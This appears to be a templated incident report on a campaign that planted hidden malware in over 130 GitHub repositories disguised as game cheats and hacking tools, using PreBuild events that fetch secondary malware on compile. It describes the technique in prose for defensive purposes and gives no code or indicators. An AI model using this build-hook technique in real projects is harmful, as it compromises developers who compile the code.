Full Report
Sophos has uncovered a scheme planting malicious code in 130+ GitHub repositories, targeting hackers and gamers
Analysis Summary
# Incident Report: Widespread Backdoored Open-Source Repository Campaign
## Executive Summary
Cybersecurity researchers uncovered a large-scale operation involving over 130 backdoored GitHub repositories, disguised as useful tools, game cheats, and hacking utilities. The campaign, attributed to an actor using the alias "ischhfd83," automatically generated commits to maintain credibility while planting hidden malware designed to steal information from other cybercriminals and novice hackers. The incident highlights the risks associated with consuming unvetted code from open-source platforms.
## Incident Details
- Discovery Date: Specific date not provided (Discovered around June 4, 2025)
- Incident Date: Ongoing campaign, first identified tool traced to this actor.
- Affected Organization: GitHub (Platform), Sophos (Discovered the activity)
- Sector: Technology/Cybercrime Ecosystem (Targeting other threat actors)
- Geography: Global (Due to the nature of GitHub repositories)
## Timeline of Events
### Initial Access
- Date/Time: Not definitively established, but the campaign was active prior to discovery.
- Vector: Supply chain compromise via malicious open-source repositories on GitHub.
- Details: Repositories were uploaded disguised as highly desirable tools (e.g., game cheats, hacking tools). Genuine code was present alongside hidden malicious components.
### Lateral Movement
- Details: The core mechanism involved a "PreBuild" event within the weaponized repositories. When a user (the intended victim) compiled the downloaded project, this event silently executed, downloading and installing secondary, undisclosed malware.
### Data Exfiltration/Impact
- Details: The ultimate goal was likely information theft from the secondary victims (other cybercriminals/hackers). Specific exfiltration methods are not detailed, but the initial payload delivered additional malware.
### Detection & Response
- Date/Time: Prior to June 4, 2025.
- How it was discovered: A Sophos customer queried the safety of a specific repository named `Sakura RAT`.
- Response actions taken: Sophos analysts investigated the initial artifact, traced the associated email address, and identified the network of 141 related repositories.
## Attack Methodology
- Initial Access: Compromising trusted platforms (GitHub) by uploading malicious repository packages.
- Persistence: Automation used (auto-generated commits) to simulate continuous, legitimate development activity.
- Privilege Escalation: Not explicitly detailed in the context of the host system, but escalation of compromise occurred via the execution of the hidden "PreBuild" event during legitimate compilation.
- Defense Evasion: Concealment of secondary payloads within the build process.
- Credential Access: Likely a goal of the secondary malware payload, targeting credentials of the user compiling the code.
- Discovery: Reconnaissance via victim compilation of the deceptive repos.
- Lateral Movement: Movement from the compiled repository download to the execution of hidden downloaders.
- Collection: The secondary malware harvested data.
- Exfiltration: Not detailed.
- Impact: Infection of users who downloaded and compiled the malicious code.
## Impact Assessment
- Financial: Not quantified, but high potential for financial impact on the secondary victims (cybercriminals).
- Data Breach: Highly likely theft of credentials, tools, or proprietary information from other threat actors.
- Operational: Disruption to the operations of the victimized cybercriminals/hackers.
- Reputational: Minor reputational impact on GitHub (as the distribution platform) and significant reputational damage to the actor "ischhfd83."
## Indicators of Compromise
- **Network Indicators (Conceptual):** Connections to domains distributing secondary malware post-compilation.
- **File Indicators (Conceptual):** Presence of malicious scripts triggered by the "PreBuild" event within repository code. Samples include project repository names related to game cheats, hacking tools, and crypto utilities.
- **Behavioral Indicators:** Automated, high-volume commit activity simulating active development across numerous repositories.
## Response Actions
- Containment measures: Researchers identified and analyzed the backdoored repositories.
- Eradication steps: Reporting the malicious repositories to GitHub for removal (implied).
- Recovery actions: Victims using these tools would need to scan environments, remove the secondary malware, and reset compromised identities.
## Lessons Learned
- Open-source supply chain risk is severe, even when targeting niche communities like hackers and gamers.
- Attackers are using deceptive automation (auto-commits) to maintain the facade of legitimate, active projects.
- The use of seemingly benign compilation events (like "PreBuild") to trigger hidden malware execution is a potent injection technique.
## Recommendations
- Implement strict scanning and vetting procedures for all third-party libraries or starter projects pulled from public repositories.
- For developers, avoid running unauthorized build scripts automatically when compiling code from unknown sources.
- Organizations should monitor internal developer activities for unusual repository cloning or high compilation rates linked to suspicious external sources.